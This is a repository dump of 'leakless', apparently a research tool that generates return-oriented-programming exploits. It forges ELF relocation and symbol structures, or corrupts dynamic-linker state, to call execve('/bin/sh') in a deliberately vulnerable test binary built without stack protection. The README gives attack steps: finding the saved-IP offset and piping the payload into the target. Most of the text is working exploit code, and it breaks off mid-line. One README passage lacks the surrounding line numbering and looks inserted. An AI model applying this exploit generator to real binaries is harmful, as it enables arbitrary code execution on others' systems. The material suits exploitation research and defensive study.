├── .gitignore
├── CMakeLists.txt
├── README.md
├── exploit.py
├── memory.py
├── plugins
│   ├── CommonGadgetsExploit.py
│   ├── RawDumperExploit.py
│   └── __init__.py
├── rangeset.py
├── utils.py
└── vuln.c

/.gitignore:
--------------------------------------------------------------------------------
1 | *.idb
2 | *.o
3 | *.pyc
4 | *.gdb_history
5 |
--------------------------------------------------------------------------------
/CMakeLists.txt:
--------------------------------------------------------------------------------
1 | cmake_minimum_required(VERSION 2.6)
2 | project(leakless)
3 | 
4 | set(VULN vuln.c)
5 | set(EXPLOIT exploit.py)
6 | 
7 | # Compiler flags
8 | # ==============
9 | 
10 | # Global flags
11 | # ------------
12 | 
13 | set(CMAKE_C_FLAGS "-fno-stack-protector -O2")
14 | set(CMAKE_SHARED_LIBRARY_LINK_C_FLAGS "")
15 | 
16 | # Architectures and related options
17 | # ---------------------------------
18 | 
19 | set(ARCHITECTURES "x86;x86-64" CACHE STRING "List of architectures to enable")
20 | 
21 | if ("${CMAKE_C_COMPILER_ID}" STREQUAL "Clang")
22 | set(INTEL_FLAVOR "-mllvm --x86-asm-syntax=intel")
23 | elseif ("${CMAKE_C_COMPILER_ID}" STREQUAL "GNU")
24 | set(INTEL_FLAVOR "-masm=intel")
25 | endif()
26 | 
27 | set(x86_FLAGS "${INTEL_FLAVOR} -m32")
28 | set(x86_OFFSET "112")
29 | 
30 | set(x86-64_FLAGS "${INTEL_FLAVOR} -m64")
31 | set(x86-64_OFFSET "120")
32 | 
33 | # Build types and related options
34 | # -------------------------------
35 | 
36 | set(BUILD_TYPES no_relro partial_relro full_relro)
37 | 
38 | set(NO_RELRO_FLAGS "")
39 | set(PARTIAL_RELRO_FLAGS "-Wl,-z,relro")
40 | set(FULL_RELRO_FLAGS "-Wl,-z,relro,-z,now")
41 | 
42 | # Testing
43 | # =======
44 | 
45 | enable_testing()
46 | 
47 | set(TEST_TYPES craft-dl-structs ld-corrupt)
48 | 
49 | set(TEST_FLAGS_craft-dl-structs "--method=craft-dl-structs")
50 | set(TEST_FLAGS_ld-corrupt "--method=ld-corrupt -l 1")
51 | 
52 | # List of tests expected to fail
53 | # ------------------------------
54 | 
55 | set(EXPECTED_TO_FAIL test-craft-dl-structs-vuln-x86-full_relro test-craft-dl-structs-vuln-x86-64-full_relro)
56 | 
57 | # Helper library
58 | # ==============
59 | 
60 | # We create a helper library to avoid issues with RELRO libcs/loaders
61 | 
62 | set(HELPER_C_FILE "${CMAKE_CURRENT_BINARY_DIR}/helper.c")
63 | file(WRITE "${HELPER_C_FILE}" "int return42() { return 42; }")
64 | foreach(ARCHITECTURE ${ARCHITECTURES})
65 | set(TARGET_NAME "helper-${ARCHITECTURE}")
66 | add_library("${TARGET_NAME}" SHARED "${HELPER_C_FILE}")
67 | set_target_properties("${TARGET_NAME}" PROPERTIES
68 | COMPILE_FLAGS "${${ARCHITECTURE}_FLAGS}"
69 | LINK_FLAGS "${${ARCHITECTURE}_FLAGS}")
70 | endforeach(ARCHITECTURE)
71 | 
72 | # Create targets
73 | # ==============
74 | 
75 | add_custom_target(length)
76 | add_custom_target(json)
77 | add_custom_target(ropl)
78 | 
79 | foreach(ARCHITECTURE ${ARCHITECTURES})
80 | foreach(BUILD_TYPE ${BUILD_TYPES})
81 | 
82 | # Binaries
83 | # --------
84 | 
85 | set(TARGET_NAME "vuln-${ARCHITECTURE}-${BUILD_TYPE}")
86 | string(TOUPPER "${BUILD_TYPE}" TYPE_PREFIX)
87 | add_executable("${TARGET_NAME}" "${VULN}")
88 | target_link_libraries("${TARGET_NAME}" "helper-${ARCHITECTURE}")
89 | set_target_properties("${TARGET_NAME}" PROPERTIES
90 | COMPILE_FLAGS "${${ARCHITECTURE}_FLAGS} ${${TYPE_PREFIX}_FLAGS}"
91 | LINK_FLAGS "${${ARCHITECTURE}_FLAGS} ${${TYPE_PREFIX}_FLAGS}")
92 | 
93 | # Tests
94 | # -----
95 | 
96 | foreach(TEST_TYPE ${TEST_TYPES})
97 | set(TEST_NAME "test-${TEST_TYPE}-${TARGET_NAME}")
98 | set(TEST_FLAGS "${TEST_FLAGS_${TEST_TYPE}}")
99 | # Invoke the exploit
100 | set(EXPLOIT_INVOCATION "${CMAKE_SOURCE_DIR}/${EXPLOIT} ${TEST_FLAGS} --offset ${${ARCHITECTURE}_OFFSET} $<TARGET_FILE:${TARGET_NAME}>")
101 | # Command to execute and check for correctness
102 | set(TEST_INVOCATION "(${EXPLOIT_INVOCATION}; echo '/bin/bash -c \"base64 -d <<< UGFzc2VkCg==\"') | $<TARGET_FILE:${TARGET_NAME}> | grep -E '^Passed$'")
103 | 
104 | # If we expect failure of this test, negate the exit result
105 | list(FIND EXPECTED_TO_FAIL "${TEST_NAME}" EXPECTED_TO_FAIL_INDEX)
106 | if (NOT EXPECTED_TO_FAIL_INDEX EQUAL -1)
107 | set(TEST_INVOCATION "! (${TEST_INVOCATION})")
108 | endif()
109 | 
110 | # Add the test
111 | add_test(NAME "${TEST_NAME}" COMMAND /bin/sh -c "${TEST_INVOCATION}")
112 | 
113 | # Add the target to obtain the length of the exploit
114 | set(TARGET_LENGTH_NAME "length-${TEST_TYPE}-${TARGET_NAME}")
115 | add_custom_target("${TARGET_LENGTH_NAME}" COMMAND /bin/sh -c "${EXPLOIT_INVOCATION} --size")
116 | add_dependencies(length "${TARGET_LENGTH_NAME}")
117 | 
118 | add_custom_command(OUTPUT "${TEST_TYPE}-${TARGET_NAME}.json"
119 | COMMAND /bin/sh -c "${EXPLOIT_INVOCATION} -o json" > ${TEST_TYPE}-${TARGET_NAME}.json)
120 | add_custom_target("json-${TEST_TYPE}-${TARGET_NAME}" DEPENDS "${TEST_TYPE}-${TARGET_NAME}.json")
121 | add_dependencies(json "json-${TEST_TYPE}-${TARGET_NAME}")
122 | 
123 | add_custom_command(OUTPUT "${TEST_TYPE}-${TARGET_NAME}.ropl"
124 | COMMAND /bin/sh -c "${EXPLOIT_INVOCATION} -o ropl" > ${TEST_TYPE}-${TARGET_NAME}.ropl)
125 | add_custom_target("ropl-${TEST_TYPE}-${TARGET_NAME}" DEPENDS "${TEST_TYPE}-${TARGET_NAME}.ropl")
126 | add_dependencies(ropl "ropl-${TEST_TYPE}-${TARGET_NAME}")
127 | 
128 | endforeach(TEST_TYPE)
129 | 
130 | endforeach(BUILD_TYPE)
131 | endforeach(ARCHITECTURE)
132 | 
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | How to test
2 | ===========
3 | 
4 | 1. Build vuln.c
5 | 
6 |     gcc -fno-stack-protector vuln.c -o /tmp/vuln -m32 -O2
7 | 
8 | 2. Find the offset of the saved IP
9 | 
10 |     ruby19 "$METASPLOIT/tools/pattern_create.rb" 256 | /tmp/vuln
11 |     dmesg | tail
12 |     ruby19 "$METASPLOIT/tools/pattern_offset.rb" $SEGFAULT_IP
13 | 
14 | 3. Launch the attack with the desired parameters
15 | 
16 |     (python ./exploit.py /tmp/vuln --offset $OFFSET; echo ls) | /tmp/vuln
17 | 
18 | You can also just dump, as JSON, all the information necessary to
19 | perform the exploit:
20 | 
21 |     python ./exploit.py /tmp/vuln -o json
22 | 
23 | For debugging information, use the `--verbose` parameter. For further
24 | information on the parameters use the `--help` parameter.
25 | 
26 | The CMake build system will compile `vuln.c` for x86 and x86-64 with
27 | different protections enabled. There's also a CTest testsuite which
28 | has been tested using the `ld.gold` linker and GCC 4.8.4. Different
29 | toolchains might require minor adjustments.
30 | 
31 | To launch it, just run:
32 | 
33 |     mkdir leakless-build
34 |     cd leakless-build
35 |     cmake ../leakless
36 |     make
37 |     make test
38 | 
39 | The build system also has the `length`, `json` and `ropl` targets
40 | which, respectively, produce the length of the generated exploit for
41 | each supported configuration, and the JSON and ropl versions of the
42 | exploit.
43 | 
44 |     make length
45 |     make json
46 |     make ropl
47 | 
48 | Basic idea
49 | ==========
50 | 
51 |     char *buffer = .bss;
52 |     char *new_stack = buffer + 1024;
53 |     int *rubbish = new_stack + 4;
54 | 
55 |     strcpy(buffer, "execve");
56 |     *((int *) buffer) = 'exec';
57 |     *(((int *) buffer) + 1) = 've\0\0';
58 |     char *name = buffer;
59 |     buffer += strlen(buffer) + 1;
60 | 
61 |     Elf32_Sym *symbol = (Elf32_Sym *) buffer;
62 |     symbol->st_name = name - .dynstr;
63 |     symbol->st_value = 0;
64 |     symbol->st_info = 0;
65 |     symbol->st_other = 0;
66 |     symbol->st_shndx = 0;
67 |     buffer += sizeof(*symbol);
68 | 
69 |     Elf32_Rel *reloc = (Elf32_Rel *) buffer;
70 |     reloc->r_offset = (Elf32_Addr) rubbish++;
71 |     reloc->r_info = R_386_JMP_SLOT | (((symbol - .dynsym) / sizeof(*symbol)) << 8);
72 |     buffer += sizeof(*reloc);
73 | 
74 |     pre_plt((char *) reloc - .rel.plt); /* on x86 the argument is a byte offset, not an index */
75 | 
76 | Helper classes
77 | ==============
78 | 
79 | * `MemoryArea`: data structure representing a part of memory, with its
80 |   start address, its size and a reference to what it's relative to
81 |   (e.g. the `MemoryArea` where we'll write the relocation structure
82 |   will be relative to the `.rel.plt`/`.rela.plt` section). `MemoryArea` also
83 |   takes care of computing the appropriate index (`MemoryArea.index`)
84 |   relative to the specified part of memory.
85 | * `Buffer`: data structure holding information about a buffer where we
86 |   want to write things. Typically this will represent the
87 |   `.bss`. `Buffer` also keeps track of which parts of it have already been
88 |   allocated (allocated areas are carved out of `Buffer.ranges`) and
89 |   allows allocating new `MemoryArea`s with the appropriate
90 |   alignment.
91 | 
92 | `Exploit`-derived classes
93 | =========================
94 | 
95 | * `Exploit`: the base class; it contains all the architecture- and
96 |   platform-independent parts of the exploit. It keeps the list of
97 |   gadgets, collects all the interesting information
98 |   about the program from the ELF file and abstracts some utility and
99 |   memory-related functions (e.g. `write_pointer` and `write_string`)
100 |   which rely on the abstract `do_writemem` function (which is
101 |   platform- and program-dependent). Finally, `jump_to` contains
102 |   the core logic for setting up the necessary data structures in the
103 |   buffers.
104 | * `CommonGadgetsExploit`: inherits from `Exploit` and introduces the
105 |   architecture-dependent parts, in particular gadgets and
106 |   function-invocation logic.
107 | * `ExecveExploit`: a very simple class implementing the logic to launch
108 |   an `execve`: it writes a `NULL` pointer and a `"/bin/sh\0"` string,
109 |   explicitly looks up `execve` and, finally, invokes it.
110 | * `RawDumperExploit`: an exploit useful to just collect the information
111 |   necessary to perform the attack without actually generating the ROP
112 |   chain. `RawDumperExploit.jump_to` will return as its first result an
113 |   array of tuples `(address, what_to_write_there)`, which, for
114 |   instance, is used to implement the `-o json` output.
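
As a rough sketch of how these pieces fit together, here is
approximately what the `launch` function in `exploit.py` does to build
an `execve("/bin/sh", ...)` chain (all names come from the code in this
repository; `exploit` is assumed to be an already-configured `Exploit`
instance, as built in `main()`; error handling and logging are omitted):

    buffer = Buffer(exploit, exploit.writeable_ranges)

    pointer_to_null = buffer.allocate(exploit.pointer_size, name="pointer_to_null")
    binsh = buffer.allocate(len("/bin/sh\0"), name="binsh")

    rop = exploit.allocate_helpers(buffer)
    rop += exploit.write_pointer(pointer_to_null, 0)   # argv/envp terminator
    rop += exploit.write_string(binsh, "/bin/sh\0")    # program to execute

    # Craft (or corrupt) the dynamic linker structures and reserve room
    # for the name of the function to resolve
    info = exploit.jump_to(buffer, len("execve\0"))
    rop += exploit.write_string(info.function_name_area, "execve\0")
    rop += info.prepare

    # Emit all the buffered writes first, then trigger the resolution
    rop = exploit.flush(buffer) + rop
    rop += invoke(exploit, info,
                  [binsh.pointer, pointer_to_null.pointer, pointer_to_null.pointer])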
115 | -------------------------------------------------------------------------------- /exploit.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import os 4 | import sys 5 | import glob 6 | import json 7 | import argparse 8 | import operator 9 | import struct 10 | import importlib 11 | 12 | import elftools.elf.structs 13 | from elftools.elf.elffile import ELFFile 14 | from elftools.elf.relocation import RelocationSection 15 | from elftools.elf.sections import SymbolTableSection 16 | from elftools.elf.constants import P_FLAGS, SH_FLAGS 17 | from elftools.elf.enums import ENUM_E_TYPE, ENUM_D_TAG 18 | 19 | from itertools import izip 20 | from operator import attrgetter 21 | from collections import namedtuple 22 | 23 | from rangeset import RangeSet 24 | 25 | import utils 26 | from utils import * 27 | from memory import * 28 | 29 | ElfN_Versym_size = 2 30 | DF_BIND_NOW = 0x8 31 | DF_1_NOW = 0x1 32 | 33 | relocation_types = { 34 | "EM_386": 7, 35 | "EM_X86_64": 7, 36 | "EM_ARM": 22 37 | } 38 | 39 | # `ExploitInfo` 40 | # * `prepare`: information on how to prepare the memory for the exploit 41 | # * `reloc_index`: the index to pass to `dl_resolve` 42 | # * `l_struct`: a *pointer* to a memory area containing a pointer to the `l` 43 | # structure used by the `dl_resolve` 44 | # * `dl_resolve`: a *pointer* to a memory area containing a pointer to the 45 | # `dl_resolve` function 46 | # * `plt0`: the address of the first entry of the .plt which will call 47 | # `_dl_runtime_resolve` 48 | ExploitInfo = namedtuple("ExploitInfo", ["prepare", "reloc_index", "l_struct", 49 | "dl_resolve", "plt0", "function_name_area"]) 50 | 51 | class Exploit: 52 | __slots__ = "arch", "little", "pointer_size", "dynstr", "dynsym", \ 53 | "relplt", "plt", "filler", "relocation_type", \ 54 | "dynamic", "versym", "gadgets", "fini" 55 | 56 | def __init__(self): 57 | self.gadgets = {} 58 | self.empty_exploit = lambda: "" 59 | self.badchars = [] 60 | 61 | def allocate_helpers(self, buffer): 62 | return "" 63 | 64 | def add_gadget(self, architecture, name, info, gadget): 65 | """Adds a gadget to the collection of gadgets for the specified architecture.""" 66 | if architecture not in self.gadgets: 67 | self.gadgets[architecture] = {} 68 | self.gadgets[architecture][name] = (info, gadget) 69 | 70 | def get_gadget(self, name): 71 | """Returns the gadget with the specified name for the current architecture""" 72 | return self.gadgets[self.arch][name] 73 | 74 | # TODO: split this, not everyone needs everything 75 | def config_from_elf(self, path): 76 | """Load all the necessary information about the program parsing the ELF 77 | headers. Furthermore, check some pre-requisites for the exploit to be 78 | successful.""" 79 | executable_file = open(path, "r") 80 | elf = ELFFile(executable_file) 81 | get_section = lambda name: first_or_none(filter(lambda section: section.name == name, elf.iter_sections())) 82 | get_section_address = lambda section: None if (get_section(section) is None) else get_section(section).header.sh_addr 83 | 84 | # Checks 85 | if elf.header.e_type == ENUM_E_TYPE["ET_EXEC"]: 86 | raise Exception("Only non-PIE executables are supported") 87 | 88 | # Binary type 89 | self.arch = elf.header.e_machine 90 | self.little = elf.little_endian 91 | self.pointer_size = elf.elfclass / 8 92 | self.pointer_format = ("0x%." 
+ str(self.pointer_size * 2) + "x") 93 | self.structs = elftools.elf.structs.ELFStructs(self.little, self.pointer_size * 8) 94 | 95 | # Useful sections 96 | self.sections = {section.name: (section.header.sh_addr, section.header.sh_addr + section.header.sh_size) for section in elf.iter_sections()} 97 | self.plt = get_section_address(".plt") 98 | self.got = get_section_address(".got") 99 | self.gotplt = get_section_address(".got.plt") 100 | 101 | # Dynamic section 102 | dynamic_section = get_section(".dynamic") 103 | self.writable_dynamic = dynamic_section.header.sh_flags & SH_FLAGS.SHF_WRITE 104 | self.dynamic = dynamic_section.header.sh_addr 105 | dynamic_entries = [self.structs.Elf_Dyn.parse(dynamic_entry) 106 | for dynamic_entry in 107 | chunks(dynamic_section.data(), self.structs.Elf_Dyn.sizeof())] 108 | 109 | # Dynamic symbols 110 | # TODO: we're relying on section names here 111 | symbol_table = elf.get_section_by_name(".dynsym") 112 | has_name = lambda name: lambda symbol: symbol.name == name 113 | attribute_or_default = lambda default, attribute, x: getattr(x, attribute) if x is not None else default 114 | memcpy_symbol = first_or_none(filter(has_name("memcpy"), symbol_table.iter_symbols())) 115 | self.memcpy_plt = 0 if memcpy_symbol is None else memcpy_symbol.entry.st_value 116 | 117 | # We try not to rely on section names 118 | get_dynamic = lambda name: first_or_none(map(lambda entry: entry.d_val, filter(lambda entry: entry.d_tag == name, dynamic_entries))) 119 | get_dynamic_index = lambda name: filter(lambda entry: entry[1].d_tag == name, enumerate(dynamic_entries))[0][0] 120 | self.dynstr = get_dynamic("DT_STRTAB") 121 | self.dynsym = get_dynamic("DT_SYMTAB") 122 | self.versym = get_dynamic("DT_VERSYM") 123 | self.verneed = get_dynamic("DT_VERNEED") 124 | self.relplt = get_dynamic("DT_JMPREL") 125 | self.addend = get_dynamic("DT_RELA") is not None 126 | self.dt_debug = self.dynamic + get_dynamic_index("DT_DEBUG") * self.structs.Elf_Dyn.sizeof() + self.pointer_size 127 | self.full_relro = (get_dynamic("DT_FLAGS") is not None) and \ 128 | ((get_dynamic("DT_FLAGS") & DF_BIND_NOW) != 0) 129 | self.full_relro = self.full_relro or ((get_dynamic("DT_FLAGS_1") is not None) and \ 130 | ((get_dynamic("DT_FLAGS_1") & DF_1_NOW) != 0)) 131 | 132 | # Choose between Elf_Rel and Elf_Rela depending on the architecture 133 | self.rel_struct = self.structs.Elf_Rela if self.addend else self.structs.Elf_Rel 134 | 135 | # Looks like 64-bit and 32-bit have different alignment for the call to _dl_fixup 136 | self.reloc_alignment = 1 if self.pointer_size == 4 else self.rel_struct.sizeof() 137 | self.reloc_index_multiplier = self.rel_struct.sizeof() if self.pointer_size == 4 else 1 138 | 139 | # 140 | # Find candidate writeable areas 141 | # 142 | 143 | # Collect PT_LOAD segments (what gets mapped) 144 | loaded_segments = filter(lambda segment: segment.header.p_type == "PT_LOAD", elf.iter_segments()) 145 | # Collect the segments which are writeable 146 | writeable_segments = filter(lambda segment: segment.header.p_flags & P_FLAGS.PF_W, loaded_segments) 147 | # Get their memory ranges (start, end) 148 | writeable_ranges = RangeSet.mutual_union(*map(lambda segment: (segment.header.p_vaddr, segment.header.p_vaddr + segment.header.p_memsz), writeable_segments)) 149 | 150 | # List of sections we don't want to write to 151 | dont_overwrite_sections = filter_none([self.dynstr, self.dynsym, self.versym, self.relplt, self.dynamic, self.got, self.gotplt]) 152 | # Memory ranges of the sections we don't want to 
write to 153 | dont_overwrite_ranges = RangeSet.mutual_union(*[self.sections[self.section_from_address(start)] for start in dont_overwrite_sections]) 154 | 155 | # Handle RELRO segment, we don't want to write there 156 | relro_segment = first_or_none(filter(lambda segment: segment.header.p_type == "PT_GNU_RELRO", elf.iter_segments())) 157 | if relro_segment is not None: 158 | dont_overwrite_ranges = dont_overwrite_ranges | RangeSet(relro_segment.header.p_vaddr, relro_segment.header.p_vaddr + relro_segment.header.p_memsz) 159 | 160 | # Compute the set of candidate memory ranges 161 | self.writeable_ranges = writeable_ranges - dont_overwrite_ranges 162 | 163 | 164 | # Save the index of the DT_FINI entry 165 | fini = filter(lambda (i, entry): entry.d_tag == "DT_FINI", enumerate(dynamic_entries)) 166 | if len(fini) > 0: 167 | self.fini = self.dynamic + self.structs.Elf_Dyn.sizeof() * fini[0][0] 168 | 169 | # Gadgets 170 | if self.gadgets.has_key(self.arch): 171 | executable_segments = filter(lambda segment: segment.header.p_flags & P_FLAGS.PF_X, elf.iter_segments()) 172 | 173 | for name, (info, gadget) in self.gadgets[self.arch].iteritems(): 174 | locations = find_all_strings(executable_segments, hex_bytes(gadget)) 175 | locations = map(self.ptr2str, locations) 176 | location = first_or_none(filter(lambda address: not reduce(lambda accumulate, badchar: badchar in address or accumulate, self.badchars , False), locations)) 177 | if location is None: 178 | self.gadgets[self.arch][name] = None 179 | else: 180 | self.gadgets[self.arch][name] = (info, gadget, location) 181 | 182 | # Find all '\x00\x00' in non-writeable segments 183 | self.non_writeable_segments = filter(lambda segment: not (segment.header.p_flags & P_FLAGS.PF_W), loaded_segments) 184 | self.zero_or_one_addresses = find_all_strings(self.non_writeable_segments, "\x00\x00") + \ 185 | find_all_strings(self.non_writeable_segments, "\x01\x00" if self.little else "\x00\x01") 186 | 187 | self.filler = self.ptr2str(reduce(lambda x,y: (x << 32) | 0xdeadb00b, xrange(1 + (self.pointer_size % 4)), 0)) 188 | self.relocation_type = relocation_types[self.arch] 189 | 190 | # 191 | # Find the reloc pointing to the symbol whose name is the earliest in .dynstr 192 | # 193 | 194 | relplt_section = elf.get_section_by_name(self.section_from_address(self.relplt)) 195 | dynsym_section = elf.get_section_by_name(self.section_from_address(self.dynsym)) 196 | 197 | if not (isinstance(relplt_section, RelocationSection) and \ 198 | isinstance(dynsym_section, SymbolTableSection)): 199 | raise Exception("Unexpect type for dynamic sections: " + str(relplt_section) + " " + str(dynsym_section)) 200 | 201 | # Grab .got.plt relocs symbol indexes 202 | symbol_indexes = [reloc.entry.r_info_sym if reloc.entry.r_info_type == self.relocation_type else None for reloc in relplt_section.iter_relocations()] 203 | # Get offsets in .dynstr 204 | names_offsets = [dynsym_section.get_symbol(index).entry.st_name if index is not None else None for index in symbol_indexes] 205 | # Filter out unamed offsets 206 | names_offsets = [offset if offset > 0 else None for offset in names_offsets] 207 | # Get the minimum value 208 | self.min_reloc_index, self.min_string_offset = min(enumerate(names_offsets), key=operator.itemgetter(1)) 209 | self.min_symbol_index = symbol_indexes[self.min_reloc_index] 210 | 211 | log(self.dump()) 212 | 213 | def get_non_writeable_segment(self, address): 214 | for non_writeable_segment in self.non_writeable_segments: 215 | start = 
non_writeable_segment.header.p_vaddr 216 | end = start + non_writeable_segment.header.p_memsz 217 | if (start <= address) and (address < end): 218 | return non_writeable_segment 219 | return None 220 | 221 | def read_non_writeable(self, address, size): 222 | segment = self.get_non_writeable_segment(address) 223 | if segment is None: 224 | raise Exception("Not a non-writeable address: " + hex(address)) 225 | start = segment.header.p_vaddr 226 | end = start + segment.header.p_memsz 227 | return segment.data()[address - start:address - start + size] 228 | 229 | def section_from_address(self, address): 230 | for name, section in self.sections.iteritems(): 231 | start = section[0] 232 | end = section[1] 233 | # TODO: we're excluding mappings at 0 234 | if (start > 0) and (start <= address) and ((address < end) or ((start > 0) and (end - start == 0))): 235 | return name 236 | raise Exception("Can't find a section for address " + hex(address)) 237 | 238 | def closest_section_from_address(self, address): 239 | sorted_sections = [0] + sorted([section[0] for section in self.sections.itervalues()]) + [(1 << 8 * self.pointer_size) - 1] 240 | for start, end in pairwise(sorted_sections): 241 | if (start <= address) and (address < end): 242 | return ("0" if start == 0 else self.section_from_address(start)) + " + " + hex(address - start) 243 | raise Exception("Can't find a section for address " + hex(address)) 244 | 245 | def dump(self): 246 | """Dump all the information held by this Exploit instance for debugging 247 | purposes.""" 248 | return "\n".join([slot + ": " + str(getattr(self, slot)) for slot in self.__slots__]) 249 | 250 | # Utility functions 251 | # ================= 252 | 253 | def ptr2str(self, integer): 254 | """Convert a pointer (in the form of an integer) to a byte string of its memory 255 | representation according the current architecture endianness.""" 256 | direction = "<" if self.little else ">" 257 | word_size = "Q" if self.pointer_size == 8 else "I" 258 | mask = (1 << self.pointer_size * 8) - 1 259 | return struct.pack(direction + word_size, integer & mask) 260 | 261 | def str2ptr(self, string): 262 | """Convert a byte string representing a pointer to an integer.""" 263 | direction = "<" if self.little else ">" 264 | word_size = "Q" if self.pointer_size == 8 else "I" 265 | return struct.unpack(direction + word_size, string)[0] 266 | 267 | # Abstractions to write memory 268 | # ============================ 269 | 270 | def write_all(self, start, string): 271 | if (self.memcpy_plt) and (len(string) > self.pointer_size): 272 | return self.memcpy(start, string) 273 | 274 | result = self.empty_exploit() 275 | remaining = string 276 | while len(remaining) > 0: 277 | remaining, writer = self.do_writemem(self.ptr2str(start + len(string) - len(remaining)), remaining) 278 | result += writer 279 | 280 | return result 281 | 282 | def flush(self, buffer): 283 | result = self.empty_exploit() 284 | 285 | content_buffer = "" 286 | areas = filter(attrgetter("is_buffered"), buffer.areas.values()) 287 | last_start = last_end = areas[0].start 288 | 289 | for memory_area in areas: 290 | memory_area.is_buffered = False 291 | 292 | if last_end == memory_area.start: 293 | content_buffer += memory_area.content 294 | last_end += len(memory_area.content) 295 | else: 296 | result += self.write_all(last_start, content_buffer) 297 | content_buffer = memory_area.content 298 | last_start = last_end = memory_area.start 299 | 300 | result += self.write_all(last_start, content_buffer) 301 | 302 | return result 303 | 
304 | def write_string(self, memory_area, string, buffered=True): 305 | """Write an input string in the specified memory area invoking an appropriate 306 | number of times the do_writemem function.""" 307 | string_len = len(string) 308 | if string_len == 0: 309 | return self.empty_exploit() 310 | elif string_len > memory_area.size: 311 | raise Exception("You're trying to write {} bytes in a MemoryArea {} bytes wide".format(string_len, memory_area.size)) 312 | 313 | memory_area.is_buffered = buffered 314 | memory_area.content = string 315 | 316 | if not buffered: 317 | return self.write_all(memory_area.start, string) 318 | else: 319 | return self.empty_exploit() 320 | 321 | def write_pointer(self, memory_area, pointer, buffered=True): 322 | """Write a pointer (an integer) to a memory area.""" 323 | return self.write_string(memory_area, self.ptr2str(pointer), buffered) 324 | 325 | def create_relocation(self, buffer, symbol_index, align_to=None): 326 | """Create an ElfN_Rel using a writable memory area as relocation 327 | target and referencing the requested symbol index.""" 328 | 329 | reloc = buffer.allocate(self.rel_struct.sizeof(), align_to, self.reloc_alignment, name="reloc") 330 | 331 | relocation_target = buffer.allocate(self.pointer_size, name="relocation_target") 332 | 333 | # Create the Elf_Rela? structure to the exploit 334 | function_reloc = self.rel_struct.parse("\0" * self.rel_struct.sizeof()) 335 | function_reloc.r_offset = relocation_target.start 336 | function_reloc.r_info_type = self.relocation_type 337 | function_reloc.r_info_sym = symbol_index 338 | 339 | if self.pointer_size * 8 == 32: 340 | function_reloc.r_info = function_reloc.r_info_type | (function_reloc.r_info_sym << 8) 341 | else: 342 | function_reloc.r_info = function_reloc.r_info_type | (function_reloc.r_info_sym << 32) 343 | 344 | prepare = self.write_string(reloc, self.rel_struct.build(function_reloc)) 345 | 346 | return prepare, reloc 347 | 348 | class CraftDlStructsExploit(Exploit): 349 | 350 | def jump_to(self, buffer, function_name_max_length): 351 | """Craft the necessary data structures (Elf_Rela?, Elf_Sym, version index) and 352 | strings to pass to the dynamic linker.""" 353 | 354 | # Part of the ROP exploit to write the data structures 355 | exploit = self.empty_exploit() 356 | 357 | # Allocate the buffers necessary for the data structure we're going to 358 | # create 359 | function_name_str = buffer.allocate(function_name_max_length, self.dynstr, 1, name="function_name_str") 360 | 361 | # TODO: move symbol as first thing in the buffer 362 | if self.versym: 363 | to_range = lambda address, size: (address, address + size) 364 | 365 | # We have three possible constraints (in order of preference): 366 | # 1. The version index has special value 0 (local) or 1 (global) 367 | # 2. The version index falls in a memory area we can write 368 | # 3. 
The version index points to ElfN_Verneed structure we can write 369 | constraints = [lambda address, versym: versym in self.zero_or_one_addresses, 370 | lambda address, versym: to_range(versym, ElfN_Versym_size) in buffer.ranges, 371 | lambda address, versym: (self.get_non_writeable_segment(versym) is not None) and \ 372 | (to_range(self.verneed + self.structs.Elf_Verneed.sizeof() * self.str2ptr(self.read_non_writeable(versym, ElfN_Versym_size)), self.structs.Elf_Verneed.sizeof()) in buffer.ranges)] 373 | 374 | wrap_versym = lambda func: lambda address, index: func(address, self.versym + ElfN_Versym_size * index) 375 | constraints = map(wrap_versym, constraints) 376 | else: 377 | constraints = [lambda x,y: True] 378 | 379 | errors = 0 380 | for constraint in constraints: 381 | try: 382 | symbol = buffer.allocate(self.structs.Elf_Sym.sizeof(), self.dynsym, name="symbol", constraint=constraint) 383 | break 384 | except AllocateFailException: 385 | errors += 1 386 | pass 387 | 388 | if self.versym: 389 | if errors > 2: # We failed 390 | raise Exception("Can't find a position for the Elf_Sym") 391 | versym_address = self.versym + ElfN_Versym_size * symbol.index 392 | if errors == 1: # We can write in ElfN_Versym 393 | versym_area = buffer.allocate(ElfN_Versym_size, align_to=self.versym, start=versym_address) 394 | exploit += self.write_string(versym_area, "\x00\x00") 395 | elif errors == 2: # We can write in ElfN_Verneed 396 | verneed_address = self.verneed + self.structs.Elf_Verneed.sizeof() * self.str2ptr(self.read_non_writeable(versym_address, ElfN_Versym_size)) 397 | verneed_area = buffer.allocate(self.structs.Elf_Verneed.sizeof(), align_to=self.verneed, start=verneed_address) 398 | 399 | verneed_struct = self.structs.Elf_Verneed.parse("\0" * self.structs.Elf_Verneed.sizeof()) 400 | verneed_struct.vn_version = 1; 401 | verneed_struct.vn_cnt = 0; 402 | verneed_struct.vn_file = 0; 403 | verneed_struct.vn_aux = 0; 404 | verneed_struct.vn_next = 0; 405 | exploit += self.write_string(verneed_area, self.structs.Elf_Verneed.build(verneed_struct)) 406 | 407 | # Append the creation of the Elf_Sym structure to the exploit 408 | function_symbol = self.structs.Elf_Sym.parse("\0" * self.structs.Elf_Sym.sizeof()) 409 | function_symbol.st_name = function_name_str.index 410 | function_symbol.st_info.bind = "STB_GLOBAL" 411 | function_symbol.st_info.type = "STT_FUNC" 412 | 413 | exploit += self.write_string(symbol, self.structs.Elf_Sym.build(function_symbol)) 414 | 415 | prepare_relocation, reloc = self.create_relocation(buffer, symbol.index, align_to=self.relplt) 416 | exploit += prepare_relocation 417 | 418 | return ExploitInfo(prepare=exploit, reloc_index=reloc.index, plt0=self.plt, l_struct=None, dl_resolve=None, function_name_area=function_name_str) 419 | 420 | class CorruptLdSoExploit(Exploit): 421 | 422 | def jump_to(self, buffer, function_name_max_length): 423 | 424 | dt_strtab_offset = ENUM_D_TAG["DT_STRTAB"] * self.pointer_size 425 | l_info_offset = 8 * self.pointer_size 426 | 427 | fake_dynstr_area = buffer.allocate(self.min_string_offset, name="fake_dynstr") 428 | function_name_area = buffer.allocate(function_name_max_length, fake_dynstr_area.start, 1, name="function_name") 429 | 430 | # TODO: instead of this support for "don't care" memory areas 431 | # Allocate the DT_STRTAB dynamic entry (possibly in the fake .dynstr itself, if it fits) 432 | if fake_dynstr_area.size >= self.structs.Elf_Dyn.sizeof(): 433 | dt_strtab_entry_area = fake_dynstr_area 434 | else: 435 | dt_strtab_entry_area = 
